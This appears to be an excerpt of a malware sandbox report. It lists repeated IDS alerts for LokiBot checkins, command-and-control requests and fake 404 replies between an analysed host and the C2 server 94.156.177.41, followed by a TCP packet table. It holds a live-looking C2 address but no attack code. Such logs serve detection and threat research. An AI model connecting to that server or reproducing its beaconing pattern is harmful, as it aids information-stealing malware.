2024-11-28T09:15:21.490327+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49874	94.156.177.41	80	TCP
2024-11-28T09:15:21.490327+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49874	94.156.177.41	80	TCP
2024-11-28T09:15:21.490327+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49874	94.156.177.41	80	TCP
2024-11-28T09:15:22.994413+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49874	94.156.177.41	80	TCP
2024-11-28T09:15:22.994413+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49874	94.156.177.41	80	TCP
2024-11-28T09:15:23.114781+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49874	TCP
2024-11-28T09:15:23.380781+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49880	94.156.177.41	80	TCP
2024-11-28T09:15:23.380781+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49880	94.156.177.41	80	TCP
2024-11-28T09:15:23.380781+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49880	94.156.177.41	80	TCP
2024-11-28T09:15:24.699039+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49880	94.156.177.41	80	TCP
2024-11-28T09:15:24.699039+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49880	94.156.177.41	80	TCP
2024-11-28T09:15:24.819027+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49880	TCP
2024-11-28T09:15:25.077799+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49885	94.156.177.41	80	TCP
2024-11-28T09:15:25.077799+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49885	94.156.177.41	80	TCP
2024-11-28T09:15:25.077799+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49885	94.156.177.41	80	TCP
2024-11-28T09:15:26.498742+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49885	94.156.177.41	80	TCP
2024-11-28T09:15:26.498742+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49885	94.156.177.41	80	TCP
2024-11-28T09:15:26.618766+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49885	TCP
2024-11-28T09:15:26.899973+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49889	94.156.177.41	80	TCP
2024-11-28T09:15:26.899973+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49889	94.156.177.41	80	TCP
2024-11-28T09:15:26.899973+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49889	94.156.177.41	80	TCP
2024-11-28T09:15:28.371147+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49889	94.156.177.41	80	TCP
2024-11-28T09:15:28.371147+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49889	94.156.177.41	80	TCP
2024-11-28T09:15:28.491168+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49889	TCP
2024-11-28T09:15:28.747512+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49893	94.156.177.41	80	TCP
2024-11-28T09:15:28.747512+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49893	94.156.177.41	80	TCP
2024-11-28T09:15:28.747512+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49893	94.156.177.41	80	TCP
2024-11-28T09:15:30.274220+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49893	94.156.177.41	80	TCP
2024-11-28T09:15:30.274220+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49893	94.156.177.41	80	TCP
2024-11-28T09:15:30.394237+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49893	TCP
2024-11-28T09:15:30.655415+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49898	94.156.177.41	80	TCP
2024-11-28T09:15:30.655415+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49898	94.156.177.41	80	TCP
2024-11-28T09:15:30.655415+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49898	94.156.177.41	80	TCP
2024-11-28T09:15:32.168060+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49898	94.156.177.41	80	TCP
2024-11-28T09:15:32.168060+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49898	94.156.177.41	80	TCP
2024-11-28T09:15:32.287996+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49898	TCP
2024-11-28T09:15:32.556717+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49903	94.156.177.41	80	TCP
2024-11-28T09:15:32.556717+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49903	94.156.177.41	80	TCP
2024-11-28T09:15:32.556717+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49903	94.156.177.41	80	TCP
2024-11-28T09:15:34.019143+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49903	94.156.177.41	80	TCP
2024-11-28T09:15:34.019143+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49903	94.156.177.41	80	TCP
2024-11-28T09:15:34.139340+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49903	TCP
2024-11-28T09:15:34.408050+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49909	94.156.177.41	80	TCP
2024-11-28T09:15:34.408050+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49909	94.156.177.41	80	TCP
2024-11-28T09:15:34.408050+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49909	94.156.177.41	80	TCP
2024-11-28T09:15:35.875260+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49909	94.156.177.41	80	TCP
2024-11-28T09:15:35.875260+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49909	94.156.177.41	80	TCP
2024-11-28T09:15:35.995187+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49909	TCP
2024-11-28T09:15:36.267971+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49914	94.156.177.41	80	TCP
2024-11-28T09:15:36.267971+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49914	94.156.177.41	80	TCP
2024-11-28T09:15:36.267971+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49914	94.156.177.41	80	TCP
2024-11-28T09:15:37.777782+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49914	94.156.177.41	80	TCP
2024-11-28T09:15:37.777782+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49914	94.156.177.41	80	TCP
2024-11-28T09:15:37.897834+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49914	TCP
2024-11-28T09:15:38.156180+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49918	94.156.177.41	80	TCP
2024-11-28T09:15:38.156180+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49918	94.156.177.41	80	TCP
2024-11-28T09:15:38.156180+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49918	94.156.177.41	80	TCP
2024-11-28T09:15:39.432277+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49918	94.156.177.41	80	TCP
2024-11-28T09:15:39.432277+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49918	94.156.177.41	80	TCP
2024-11-28T09:15:39.552495+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49918	TCP
2024-11-28T09:15:39.816583+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49922	94.156.177.41	80	TCP
2024-11-28T09:15:39.816583+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49922	94.156.177.41	80	TCP
2024-11-28T09:15:39.816583+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49922	94.156.177.41	80	TCP
2024-11-28T09:15:41.183582+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49922	94.156.177.41	80	TCP
2024-11-28T09:15:41.183582+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49922	94.156.177.41	80	TCP
2024-11-28T09:15:41.329580+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49922	TCP
2024-11-28T09:15:41.597339+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49928	94.156.177.41	80	TCP
2024-11-28T09:15:41.597339+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49928	94.156.177.41	80	TCP
2024-11-28T09:15:41.597339+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49928	94.156.177.41	80	TCP
2024-11-28T09:15:42.916927+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49928	94.156.177.41	80	TCP
2024-11-28T09:15:42.916927+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49928	94.156.177.41	80	TCP
2024-11-28T09:15:43.036876+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49928	TCP
2024-11-28T09:15:43.294626+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49930	94.156.177.41	80	TCP
2024-11-28T09:15:43.294626+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49930	94.156.177.41	80	TCP
2024-11-28T09:15:43.294626+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49930	94.156.177.41	80	TCP
2024-11-28T09:15:44.758427+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49930	94.156.177.41	80	TCP
2024-11-28T09:15:44.758427+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49930	94.156.177.41	80	TCP
2024-11-28T09:15:44.878631+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49930	TCP
2024-11-28T09:15:45.140468+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49935	94.156.177.41	80	TCP
2024-11-28T09:15:45.140468+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49935	94.156.177.41	80	TCP
2024-11-28T09:15:45.140468+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49935	94.156.177.41	80	TCP
2024-11-28T09:15:46.605174+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49935	94.156.177.41	80	TCP
2024-11-28T09:15:46.605174+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49935	94.156.177.41	80	TCP
2024-11-28T09:15:46.725331+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49935	TCP
2024-11-28T09:15:46.988970+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49938	94.156.177.41	80	TCP
2024-11-28T09:15:46.988970+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49938	94.156.177.41	80	TCP
2024-11-28T09:15:46.988970+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49938	94.156.177.41	80	TCP
2024-11-28T09:15:48.264914+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49938	94.156.177.41	80	TCP
2024-11-28T09:15:48.264914+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49938	94.156.177.41	80	TCP
2024-11-28T09:15:48.384986+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49938	TCP
2024-11-28T09:15:48.663942+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49943	94.156.177.41	80	TCP
2024-11-28T09:15:48.663942+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49943	94.156.177.41	80	TCP
2024-11-28T09:15:48.663942+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49943	94.156.177.41	80	TCP
2024-11-28T09:15:50.179950+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49943	94.156.177.41	80	TCP
2024-11-28T09:15:50.179950+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49943	94.156.177.41	80	TCP
2024-11-28T09:15:50.300740+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49943	TCP
2024-11-28T09:15:50.622383+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49948	94.156.177.41	80	TCP
2024-11-28T09:15:50.622383+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49948	94.156.177.41	80	TCP
2024-11-28T09:15:50.622383+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49948	94.156.177.41	80	TCP
2024-11-28T09:15:51.927975+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49948	94.156.177.41	80	TCP
2024-11-28T09:15:51.927975+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49948	94.156.177.41	80	TCP
2024-11-28T09:15:52.047991+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49948	TCP
2024-11-28T09:15:52.328756+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49952	94.156.177.41	80	TCP
2024-11-28T09:15:52.328756+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49952	94.156.177.41	80	TCP
2024-11-28T09:15:52.328756+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49952	94.156.177.41	80	TCP
2024-11-28T09:15:53.838780+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49952	94.156.177.41	80	TCP
2024-11-28T09:15:53.838780+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49952	94.156.177.41	80	TCP
2024-11-28T09:15:53.958941+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49952	TCP
2024-11-28T09:15:54.218254+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49958	94.156.177.41	80	TCP
2024-11-28T09:15:54.218254+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49958	94.156.177.41	80	TCP
2024-11-28T09:15:54.218254+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49958	94.156.177.41	80	TCP
2024-11-28T09:15:55.578098+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49958	94.156.177.41	80	TCP
2024-11-28T09:15:55.578098+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49958	94.156.177.41	80	TCP
2024-11-28T09:15:55.697992+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49958	TCP
2024-11-28T09:15:55.988730+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49962	94.156.177.41	80	TCP
2024-11-28T09:15:55.988730+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49962	94.156.177.41	80	TCP
2024-11-28T09:15:55.988730+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49962	94.156.177.41	80	TCP
2024-11-28T09:15:57.305447+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49962	94.156.177.41	80	TCP
2024-11-28T09:15:57.305447+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49962	94.156.177.41	80	TCP
2024-11-28T09:15:57.425469+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49962	TCP
2024-11-28T09:15:57.686634+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49966	94.156.177.41	80	TCP
2024-11-28T09:15:57.686634+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49966	94.156.177.41	80	TCP
2024-11-28T09:15:57.686634+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49966	94.156.177.41	80	TCP
2024-11-28T09:15:59.102043+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49966	94.156.177.41	80	TCP
2024-11-28T09:15:59.102043+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49966	94.156.177.41	80	TCP
2024-11-28T09:15:59.222001+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49966	TCP
2024-11-28T09:15:59.487158+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49971	94.156.177.41	80	TCP
2024-11-28T09:15:59.487158+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49971	94.156.177.41	80	TCP
2024-11-28T09:15:59.487158+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49971	94.156.177.41	80	TCP
2024-11-28T09:16:00.808598+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49971	94.156.177.41	80	TCP
2024-11-28T09:16:00.808598+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49971	94.156.177.41	80	TCP
2024-11-28T09:16:00.928602+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49971	TCP
2024-11-28T09:16:01.189356+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49976	94.156.177.41	80	TCP
2024-11-28T09:16:01.189356+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49976	94.156.177.41	80	TCP
2024-11-28T09:16:01.189356+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49976	94.156.177.41	80	TCP
2024-11-28T09:16:02.508043+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49976	94.156.177.41	80	TCP
2024-11-28T09:16:02.508043+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49976	94.156.177.41	80	TCP
2024-11-28T09:16:02.628085+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49976	TCP
2024-11-28T09:16:02.889650+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49982	94.156.177.41	80	TCP
2024-11-28T09:16:02.889650+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49982	94.156.177.41	80	TCP
2024-11-28T09:16:02.889650+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49982	94.156.177.41	80	TCP
2024-11-28T09:16:04.174440+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49982	94.156.177.41	80	TCP
2024-11-28T09:16:04.174440+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49982	94.156.177.41	80	TCP
2024-11-28T09:16:04.294475+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49982	TCP
2024-11-28T09:16:04.587142+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49987	94.156.177.41	80	TCP
2024-11-28T09:16:04.587142+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49987	94.156.177.41	80	TCP
2024-11-28T09:16:04.587142+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49987	94.156.177.41	80	TCP
2024-11-28T09:16:06.009910+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49987	94.156.177.41	80	TCP
2024-11-28T09:16:06.009910+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49987	94.156.177.41	80	TCP
2024-11-28T09:16:06.130178+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49987	TCP
2024-11-28T09:16:06.389002+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49990	94.156.177.41	80	TCP
2024-11-28T09:16:06.389002+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49990	94.156.177.41	80	TCP
2024-11-28T09:16:06.389002+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49990	94.156.177.41	80	TCP
2024-11-28T09:16:07.709410+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49990	94.156.177.41	80	TCP
2024-11-28T09:16:07.709410+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49990	94.156.177.41	80	TCP
2024-11-28T09:16:07.829417+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49990	TCP
2024-11-28T09:16:08.095796+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49995	94.156.177.41	80	TCP
2024-11-28T09:16:08.095796+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49995	94.156.177.41	80	TCP
2024-11-28T09:16:08.095796+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49995	94.156.177.41	80	TCP
2024-11-28T09:16:09.414886+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49995	94.156.177.41	80	TCP
2024-11-28T09:16:09.414886+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49995	94.156.177.41	80	TCP
2024-11-28T09:16:09.534938+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	49995	TCP
2024-11-28T09:16:09.797793+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	50000	94.156.177.41	80	TCP
2024-11-28T09:16:09.797793+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	50000	94.156.177.41	80	TCP
2024-11-28T09:16:09.797793+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	50000	94.156.177.41	80	TCP
2024-11-28T09:16:11.219184+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	50000	94.156.177.41	80	TCP
2024-11-28T09:16:11.219184+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	50000	94.156.177.41	80	TCP
2024-11-28T09:16:11.339205+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	50000	TCP
2024-11-28T09:16:11.614597+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	50004	94.156.177.41	80	TCP
2024-11-28T09:16:11.614597+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	50004	94.156.177.41	80	TCP
2024-11-28T09:16:11.614597+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	50004	94.156.177.41	80	TCP
2024-11-28T09:16:13.036489+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	50004	94.156.177.41	80	TCP
2024-11-28T09:16:13.036489+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	50004	94.156.177.41	80	TCP
2024-11-28T09:16:13.169394+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	50004	TCP
2024-11-28T09:16:13.446836+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	50009	94.156.177.41	80	TCP
2024-11-28T09:16:13.446836+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	50009	94.156.177.41	80	TCP
2024-11-28T09:16:13.446836+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	50009	94.156.177.41	80	TCP
2024-11-28T09:16:14.719923+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	50009	94.156.177.41	80	TCP
2024-11-28T09:16:14.719923+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	50009	94.156.177.41	80	TCP
2024-11-28T09:16:14.840154+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	50009	TCP
2024-11-28T09:16:15.111182+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	50012	94.156.177.41	80	TCP
2024-11-28T09:16:15.111182+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	50012	94.156.177.41	80	TCP
2024-11-28T09:16:15.111182+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	50012	94.156.177.41	80	TCP
2024-11-28T09:16:16.432519+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	50012	94.156.177.41	80	TCP
2024-11-28T09:16:16.432519+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	50012	94.156.177.41	80	TCP
2024-11-28T09:16:16.552480+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.7	50012	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2024 09:14:14.852051973 CET	49703	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:14.973093987 CET	80	49703	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:14.973197937 CET	49703	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:14.976162910 CET	49703	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:15.096057892 CET	80	49703	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:15.096111059 CET	49703	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:15.216389894 CET	80	49703	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:16.412965059 CET	80	49703	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:16.412980080 CET	80	49703	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:16.413073063 CET	49703	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:16.413166046 CET	49703	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:16.533169985 CET	80	49703	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:16.611223936 CET	49705	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:16.731297970 CET	80	49705	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:16.731389999 CET	49705	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:16.735785007 CET	49705	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:16.856059074 CET	80	49705	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:16.856131077 CET	49705	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:16.976085901 CET	80	49705	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:18.371232033 CET	80	49705	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:18.371331930 CET	49705	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:18.371335983 CET	80	49705	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:18.371646881 CET	49705	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:18.454952002 CET	49707	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:18.491276979 CET	80	49705	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:18.574897051 CET	80	49707	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:18.576627016 CET	49707	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:18.577112913 CET	49707	80	192.168.2.7	94.156.177.41
